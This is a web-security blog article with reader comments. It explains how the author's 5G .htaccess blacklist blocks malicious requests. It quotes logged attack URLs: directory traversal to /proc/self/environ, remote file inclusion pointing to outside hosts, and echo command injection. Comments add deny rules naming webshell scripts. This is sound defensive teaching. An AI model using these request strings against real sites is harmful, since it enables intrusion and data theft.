Building the 5G Blacklist

Protecting your website is more important than ever. There are a million ways to do it, and this is one of them. In fact, it’s what I use to protect Perishable Press and other key sites. It’s called the 5G Blacklist, and it’s something I’ve been working on for a long time. The idea is simple enough: analyze bad requests and block them using a firewall/blacklist via .htaccess. Now in its 5th generation, the 5G Blacklist has evolved into a solid method of keeping your site safe and secure. How does it work? I’m glad you asked..

What “normal” site traffic looks like

I’m no expert in traffic analysis, security, or anything else for that matter, but I love to study error logs, and love even more stopping bad guys from spamming, cracking, and exploiting my site. Gots to keep it safe and secure, and a great way to do it is understanding what’s happening behind the scenes on your server.

“Normal” site traffic involves all sorts of requests and a variety of legitimate responses. Ideally, all URL requests for your site’s resources will return a favorable 200 OK status code: user requests something from your site, and the server is able to locate and send the resource back to the user. Hopefully you’re getting plenty of 200-OK responses, but that’s not the only thing happening on your server.

Normally you’re also going to see lots of other status codes, depending on how well (or badly) you’ve got things configured. Here are some examples of hopefully less-common things happening on your server:

  • 301 Moved Permanently – resource moved and redirected permanently
  • 302 Found – resource moved and redirected temporarily
  • 400 Bad Request – server does not understand request
  • 401 Unauthorized – resource is protected, request not authorized
  • 403 Forbidden – server refuses to return the requested resource
  • 404 Not Found – server can’t find the requested resource
  • 410 Gone – requested resource is no longer available
  • 500 Internal Server Error – something is screwed up with the server

..and so on, with all sorts of other responses showing up in typically smaller volumes. Even a cursory glance through your access/error logs will reveal this type of server activity. Normal traffic includes a wide variety of these responses, in proportions that vary depending on your setup.
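
How many of these responses you see depends partly on your own configuration. As a rough illustration, the mod_alias directives below would deliberately produce several of the status codes listed above. The paths and target URLs are made-up placeholders, not rules taken from Perishable Press:

```apache
# Hypothetical paths; each directive makes Apache answer with a specific status
<IfModule mod_alias.c>
    # 301 Moved Permanently: old URL redirected for good
    Redirect 301 /old-page/ http://example.com/new-page/

    # 302 Found: temporary redirect
    Redirect 302 /promo/ http://example.com/current-promo/

    # 410 Gone: resource removed on purpose (no target URL is given)
    Redirect gone /retired-page/

    # 403 Forbidden: refuse anything under this path
    RedirectMatch 403 ^/private/
</IfModule>
```

Requests that match none of your rules and none of your files fall through to the default 404.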

[ Common Server Responses ]
Relative proportion of top server responses for Perishable Press

The above diagram isn’t scientific, but it’s a good representation of the relative amount of different types of traffic on the server. There are actually way more 200-OK responses happening, but I didn’t want the graphic to be 7000px in height. Hopefully the idea is clear: you should be getting mostly 200-level responses, and also see a reasonable number of other responses as well.

What “bad” traffic looks like

Notice in the above diagram that there are quite a few 403 and 404 errors. This is primarily due to the way I have things set up with the 5G Blacklist and other security measures. I spend probably way too much time tracking down and resolving 404s, which otherwise would be much more prevalent. The real key here is the relatively high volume of 403 responses. This is due to implementation of the 5G Firewall/Blacklist. Without it installed, the traffic pattern might look more like this:

[ Relative Server Responses ]
How traffic might look without the 5G Blacklist

Without the 5G in place, there would be way more 404 errors and not nearly as many 403 errors. Why is this? It has to do with what the bad guys are doing when they hit your site, and how the 5G Blacklist works to block the bad stuff and keep your site safe. In general, it goes something like this:

  1. Bad guys use a script to scan your website for vulnerabilities
  2. The script requests anywhere from a few to thousands of different URLs
  3. Virtually all of these malicious requests are targeting non-existent resources using weird-looking, abnormal URLs
  4. The server can’t find any of these weird resources, so it sends back the default 404 response (most often)
  5. As evil scripts continue to scan your site, they waste your server’s precious resources – memory, bandwidth, etc.
  6. The more this happens, the more 404 errors are recorded in your error & access logs

In small volumes, as seen with typical traffic patterns, the default 404 response is perfectly fine, even helpful. If something doesn’t exist, that’s the clearest way of communicating the information. But these days, websites are being targeted and scanned almost constantly, and it seems to get worse every day. The problem with doing nothing and just rolling with the default 404 responses is that it leaves the door open to further exploits should a malicious scan actually find a weakness. For example:

  1. Evil script scans your site and finds a hole at, say, http://example.com/some/crazy/1337/*%*/url
  2. The server would normally return a 404 Not Found response, but won’t if the request can be met (i.e., exploit opportunity)
  3. This allows the attacker to exploit the hole found via the requested URL

And even if the server responds with a 404, there is nothing stopping the attack script from requesting similarly structured URLs. So instead of a single 404 and done with it, malicious scans may continue freely requesting variations on the target URL, for example:

http://example.com/some/crazy/1337/*%*/url
http://example.com/another/crazy/1337/*%*/url
http://example.com/some/crazy/s0-1337/*%*()/url
http://example.com/some/crazy/1337/*%*/url?url=http://blahblah..
http://example.com/something/even/crazier/1337/*%*()/url?payload=

In my experience, it’s better to stop these requests as soon as possible, denying bad guys the chance to scan ad nauseam whatever they want. The key to doing this is understanding what’s happening on your server. Armed with that information, securing your site is a matter of analyzing server logs, matching malicious request patterns, and testing everything until your eyes glaze over and the migraine kicks in..

Or you can let someone else do it.

Building the 5G Blacklist

First of all, here’s how the 5G Blacklist works:

  1. Include the blacklist code in your site’s root .htaccess file
  2. Apache executes the .htaccess directives for each URL request
  3. The 5G Blacklist blocks requests that include matching strings of evil garbage

That’s actually how just about any blacklist/firewall works. There are other ways to protect your site against malicious requests, but handling them at the server level with .htaccess (or the httpd.conf file) is better for performance than, say, using PHP to connect to the database, or using a WordPress plugin or similar, because a blocked request is refused before PHP or the database gets involved. It’s also easier to install and manage: literally copy, paste, upload, and test. No configuring or editing required. When it’s time to update, just replace with the latest version. The trick is finding a current blacklist that’s been well-tested.
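
To make the copy-and-paste step concrete, here is a minimal sketch of how a root .htaccess might be laid out on a WordPress site. Putting the blacklist above the WordPress block is an assumption made for illustration (this article doesn’t prescribe a position), and the single RedirectMatch line merely stands in for the full 5G code:

```apache
# --- blacklist section (stand-in for the full 5G code) ---
<IfModule mod_alias.c>
    # One sample rule of the kind discussed later in this article
    RedirectMatch 403 \.css\(
</IfModule>

# BEGIN WordPress (the stock permalink rules, left untouched)
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
```

After uploading, request a few normal pages plus a known-bad URL to confirm that the former still load and the latter comes back 403.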

Evolution of the 5G

To see what it is, let’s look at where it’s been:

  1. Ultimate htaccess Blacklist (Compressed Version)
  2. 2G Blacklist: Closing the Door on Malicious Attacks
  3. Perishable Press 3G Blacklist
  4. The Perishable Press 4G Blacklist
  5. 5G Firewall (Beta)

Along the way, I’ve explored a wide variety of different blacklist techniques. The 5G is the culmination of all these efforts, and will eventually be replaced by the imminent 6G Blacklist/Firewall. Currently the beta release is the latest version of the blacklist, and the official/final 5G will be posted soon.

Specific examples

Now let’s look at some specific examples of what we’re blocking with the 5G. I won’t go into depth as I did explaining the building of the 4G blacklist, but will try to cover a good variety of specific examples. Reading through should give you a solid understanding of how blacklists work in general, and a good overview as to what the 5G does to help protect your site.

The simple .css(

We’ll start with one of the most common types of malicious request, those that include the “.css(” character string. Here are some examples:

http://example.com/ip-detection-bad-seo/).css(
http://example.com/ip-detection-bad-seo/);f=e.css(
http://example.com/ip-detection-bad-seo/);this.elem.style.display=a:this.options.display;if(c.css(this.elem,
http://example.com/ip-detection-bad-seo/+b]):f===v.css(e,d):this.css(d,typeof%20f===

Notice the common pattern in these idiot requests: .css(. Instead of trying to block the user-agent or IP address for thousands of these requests, it’s more efficient to identify the best common pattern and block any matches. Here is a simple .htaccess directive that blocks all of these silly requests:

RedirectMatch 403 \.css\(

..but that’s some strong medicine, possibly interfering with legitimate requests. So you need to find balance between effective matching and the number of false positives. We’ll see an example of this just ahead. For now, notice how that single rule effectively blocks the endless stream of “.css(”-type malicious requests.
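
One way to soften that strong medicine, sketched here as an assumption rather than as part of the 5G, is to express the same match with mod_rewrite and exempt a path where “.css(” could legitimately appear. The /docs/ path is purely hypothetical:

```apache
<IfModule mod_rewrite.c>
    RewriteEngine On

    # Skip the hypothetical /docs/ area, where such strings are allowed
    RewriteCond %{REQUEST_URI} !^/docs/
    # Match the literal string ".css(" anywhere in the requested path
    RewriteCond %{REQUEST_URI} \.css\(
    # No substitution ("-"); just answer 403 Forbidden
    RewriteRule .* - [F]
</IfModule>
```

This would be used in place of the RedirectMatch version, not alongside it. The trade-off is an extra line to maintain for every exemption you add.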

The ubiquitous mosConfig_absolute_path

Another commonly seen malicious scan targets various URLs containing the character string “mosConfig_absolute_path”. Most often, this is included in the query-string part of the URL, as seen in this fistful of examples:

http://example.com/include.pcchess.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/videodb.class.xml.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://youregypt.com/id/Ckrid1.txt??
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://youregypt.com/id/Ckrid1.txt??
http://example.com/components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.fileden.com/files/2011/1/27/3068675//fx29id1.txt??

Again, you could spend a lifetime trying to block these requests using IP or user-agent, but it’s way easier and more efficient to simply block the most effective common pattern, which happens in 5G via this rule:

RewriteCond %{QUERY_STRING} (environ|localhost|mosconfig|scanner) [NC,OR]

This powerful directive also blocks several other strings, and thanks to the NC (no case) flag it matches any variation on mosconfig regardless of capitalization, such as mosConfig_absolute_path, as observed in the example URLs. Broad matches like this are why it’s important to carefully construct your .htaccess rules – many malicious requests target known software, and in doing so they include legitimate variables and parameters in the scanned URLs. The 5G is fine-tuned primarily for WordPress sites, so blocking requests for the mosConfig_ pattern is no problem; however, mosConfig_ is an actual part of Joomla, Mambo, and possibly others.
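
On its own, a RewriteCond line does nothing: it needs the rewrite engine switched on and a RewriteRule to act on the match. A minimal standalone sketch of this one condition might look like the following. The wrapper and the RewriteRule line are assumptions about how the pieces fit together, not a quote from the 5G, and the OR flag is dropped because no other condition follows:

```apache
<IfModule mod_rewrite.c>
    RewriteEngine On

    # NC = case-insensitive, so "mosconfig" also matches "mosConfig_absolute_path"
    RewriteCond %{QUERY_STRING} (environ|localhost|mosconfig|scanner) [NC]

    # Any URL whose query string matched gets 403 Forbidden
    RewriteRule .* - [F]
</IfModule>
```

With something like this in place, a request carrying ?mosConfig_absolute_path=... should come back 403, while the same URL without the query string is unaffected.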

Directory path to heaven

How high can you go? That’s the question some malicious scripts are asking your server about its directory structure. Here’s a rather violent sequence of directory-traversal requests that hit my site recently:

http://example.com/press/2006/01/10/stupid-htaccess-tricks/index.php?ref=../../../../../../../../../../../../../../../../../../../proc/self/environ
http://example.com/press/2006/01/10/stupid-htaccess-tricks/index.php?ref=../../../../../../../../../../../../../../../../../../../proc/self/environ
http://example.com/comment.php?blog=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%00
http://example.com/press/2009/12/01/stupid-wordpress-tricks/comment.php?blog=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%00
http://example.com/components/com_extcalendar/admin_events.php?CONFIG_EXTLANGUAGES_DIR=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000
http://example.com/components/com_extcalendar/admin_events.php?CONFIG_EXTLANGUAGES_DIR=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000
http://example.com/dompdf/dompdf.php?input_file=http://www.ourl.in/1???
http://example.com/press/2006/01/10/index.php?ref=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000
http://example.com/press/2006/01/10/index.php?ref=../../../../../../../../../../../../../../../../../../../proc/self/environ%00
http://example.com/press/2006/01/10/index.php?ref=/proc/self/environ

Of course, the common denominator for nearly all of these requests is “../”, which as far as I know is never present in legitimate URI requests. (The bare /proc/self/environ request has no “../” at all, but its query string contains “environ”, so the query-string rule shown earlier catches it.) Typically the directory-traversal string is included in the query string, so we can use mod_rewrite’s QUERY_STRING variable to block this type of malicious request. The 5G uses the following rule to do the job:

RewriteCond %{QUERY_STRING} \.\./ [NC,OR]
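
Because the 5G conditions end in OR, they are meant to be stacked, with a single RewriteRule at the bottom. Here is a hedged sketch chaining the two query-string conditions shown in this article. The middle condition is an added assumption, not part of the 5G: mod_rewrite tests QUERY_STRING as it was sent (it is not URL-decoded), so a percent-encoded “../” would slip past the literal pattern unless it is matched explicitly:

```apache
<IfModule mod_rewrite.c>
    RewriteEngine On

    # Literal "../" anywhere in the query string (as shown in the article)
    RewriteCond %{QUERY_STRING} \.\./ [NC,OR]
    # Assumption: also catch encoded forms such as "%2e%2e%2f" or "..%2f"
    RewriteCond %{QUERY_STRING} (\.|%2e)(\.|%2e)(/|%2f) [NC,OR]
    # Last condition in the chain, so no OR flag
    RewriteCond %{QUERY_STRING} (environ|localhost|mosconfig|scanner) [NC]

    # Forbid the request if any one of the conditions matched
    RewriteRule .* - [F]
</IfModule>
```

The broader the pattern, the more testing it needs, so it’s worth trying a rule like the encoded-traversal one against your own legitimate URLs before relying on it.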

And just for fun, here’s an infographic that attempts to visualize what’s happening on the server for this type of recursive directory traversal request:

[ visualizing recursive directory requests ]
A sort of virtual Inception

Don’t worry if that’s just confusing – it’s mostly hypothetical. The take-home message here is that you can block this type of evil request quite easily, with a single line of code.

Summary

Long posts deserve good summaries. Or something. Here’s a quick recap of the key points in this article:

  • Websites are constantly scanned/attacked by malicious scripts
  • Constant scanning and spamming wastes bandwidth and resources
  • Decreased server performance negatively impacts rank, success
  • It is possible to block a majority of malicious requests
  • The 5G Blacklist is one way of protecting your website
  • The 5G uses regular expressions to block bad requests
  • These expressions match evil character strings in the URL
  • Include the 5G in your site’s root .htaccess file
  • Upload to your server, test thoroughly, and done.

I hope this article is informative and useful. If you have questions or suggestions please share them in the comments. Thanks :)

About the Author
Jeff Starr = Web Developer. Book Author. Secretly Important.

20 responses to “Building the 5G Blacklist”

  1. Matt Zimmermann 2011/09/23 9:15 am

    Fantastic article Jeff. I’m looking forward to trying this out.

  2. Pauli Price 2011/09/23 11:29 am

    I read this with interest, and also popped back to read the details of the 4G blacklist.

    I would have been completely on board with you on blocking commas from the root url — except for the fact that I recently implemented just that URL form on my current wordpress install.

    You see the new advanced taxonomy query in WP translates lists of terms that are combined with OR as ‘term1,term2’ and combined with AND as ‘term1+term2’

    I thought it would never work, but indeed example.com/tag-slug/term1,term2 resolved to the taxonomy.php template with both terms included in the tax-query element of the query array.

    I can certainly manually drop that rule while implementing these rules on my site — just thought I’d highlight the issue here for others to consider.

  3. Jessi Hance 2011/09/23 12:01 pm

    The mosconfig stuff is good even for folks running Joomla 1.5 or newer. In fact, there’s a blocking rule in the default .htaccess that comes with Joomla:

    # Block out any script trying to set a mosConfig value through the URL
    # (these attacks wouldn't work w/out Joomla! 1.5's Legacy Mode plugin)
    RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]

  4. You’re still working hard for us, Jeff. I was beginning to think that the 5G might not appear, but I should have had more faith!

    I have a question about performance, though. Will there be any increase in server load and, if so, will it be cancelled out by the reduction in scumbag activity? (Even on a start-up blog that has yet to build up its traffic?) And I know that you’re a WordPress guy, but the 5G should also be OK with Drupal, right?

  5. Ron Nitzsche 2011/09/23 2:38 pm

    Thanks a lot for this great read!

  6. Would there be a few special considerations if simply adding this to, say, Apache 2.2.21’s configuration file per site? I have implemented this and a few others into several small sites I have written.. Kept getting huge entries of attacks.. to bounce traffic/requests away… I remember having to make a few alterations ( and having some issues with access due to names on a file server.. :P ).. Just wondering.. if the HTACCESS method of implementation is absolutely needed.. as of this point in time..

  7. Rarely has a post from Perishable Press shown up in my RSS reader that was not worth reading.

    Been using 5G beta since Feb with not one problem, looking forward to 6G!

  8. M.K. Safi 2011/09/24 4:22 am

    I use Bad Behavior plugin. But you’re saying handling this at server level is more efficient. This may be true and I’d like to get on board, but it’s not really easier to install and manage than a plugin. A plugin is a set & forget. 5G needs copying, pasting, testing, and keeping an eye out for updates.

    Have you considered shipping this as a plugin that writes the directives to .htaccess? Bad Behavior cannot protect super cached pages that are served with mod_rewrite because it uses PHP, but 5G would not have this limitation, right?

  9. Doug Smith 2011/09/24 6:34 am

    Thanks so much for your work and sharing of the blacklists. I’ve used them as a part of my overall strategy the last few years and they’ve been very helpful.

    I’m glad you posted this article because it served as a good reminder to visit your 5G beta page to share some more of the modifications I’ve made and see what others have shared too.

    • Doug Smith 2011/09/24 8:33 am

      I had forgotten you closed comments after a while when I wrote that. So never mind commenting over on the 5G beta page. :-) Here are a few more things I’ve learned and added after running the 5G rules for a while.

      – You look for “base64” in the request strings but I’m also seeing a lot of “base64_encode” in the query string so I added that.

      – I’ve also been seeing a lot of query strings looking for “GLOBALS” and “_REQUEST”, followed by various hex codes and equaling various values. Here’s what I’m using to block those. I don’t know if there are valid uses so I only blocked the specific requests I was seeing rather than just those keywords on their own.

      RewriteCond %{QUERY_STRING} GLOBALS(=|\[|%[0-9A-Z]{0,2}) [OR]
      RewriteCond %{QUERY_STRING} _REQUEST(=|\[|%[0-9A-Z]{0,2}) [OR]

      – I constantly see attempts to find the phpMyAdmin script. I do use that script but it’s through cpanel, which obscures it a bit. I use the following lines to block most of the attempts without stopping my use. I’m thinking it could block legitimate use on some server configurations, though.

      RewriteCond %{THE_REQUEST} \s/pma/ [NC,OR]
      RewriteCond %{THE_REQUEST} myadmin [NC,OR]

      – I added “.bs” to the list of file extensions.

      RedirectMatch 403 \.(cgi|asp|aspx|cfg|dll|exe|jsp|mdb|sql|ini|rar|bs)$

      – I added “environ” to the request strings.

      RedirectMatch 403 (base64|crossdomain|localhost|wwwroot|environ)

      – I previously mentioned removing “register.php” from the request strings because it was interfering with bbPress registrations. I don’t think this will be a factor with the new bbPress plugin but I’ll need to do some more testing.

      – I’m not sure why but the following line was blocking a check from blogcarnival.com when submitting an article from my site. Since I occasionally participate in blog carnivals I had to remove it.

      RedirectMatch 403 .well-known/host-meta

      – I added a few more php scripts I was seeing frequent probes for to the request strings. I actually have a lot more rules to block probing for software I don’t have but including them in a general ruleset would likely block legitimate use of software others use.

      RedirectMatch 403 (r57|c99|c99ud|bypass|safe0ver)\.php

      – Ever since the news of the vulnerability in timthumb.php, which is used in many WordPress themes, I’ve been seeing a lot of activity looking for that script in known themes to exploit. These rules pretty much take care of it.

      RedirectMatch 403 (tim)?thumb\.php
      RedirectMatch 403 phpThumb\.php
      RedirectMatch 403 ^/wp-content/(plugins|themes|uploads)/.+/(cache|temp)/

      I hope some of that is helpful to others as well.

  10. Jeff

    Thanks for your work on this! I’ve been using elements of your blacklists since version III and find them invaluable.

    Regarding the 5G version, I’ve found that some parts of the QUERY STRINGS section block legitimate access to the back end of some Joomla extensions.

  11. Conor Hughes 2011/09/26 5:54 am

    It would appear there is a conflict with Pingdom.com in the 5G blacklist

  12. Sensei Jeff, it’s good to see the 5G going RTM. A ton of rock-solid info here, people take note.

    Just as 80% of success can be achieved by simply turning up, 90% or more of what will screw your site can usually be gleaned from patterns in the access logs.

    I have to admit I’m also a victim of the face-hugger that is the Apache access log (thanks a bunch, Perishable!).

    Plugins can play a role, though. A suitably-crafted plugin can intercept the flow, perhaps informing the blog-dood about specific circumstances that are beyond the scope of existing .htaccess rule sets.

    As you might guess, I’m developing something along those lines right now (which is having an impressive impact on comment spam).
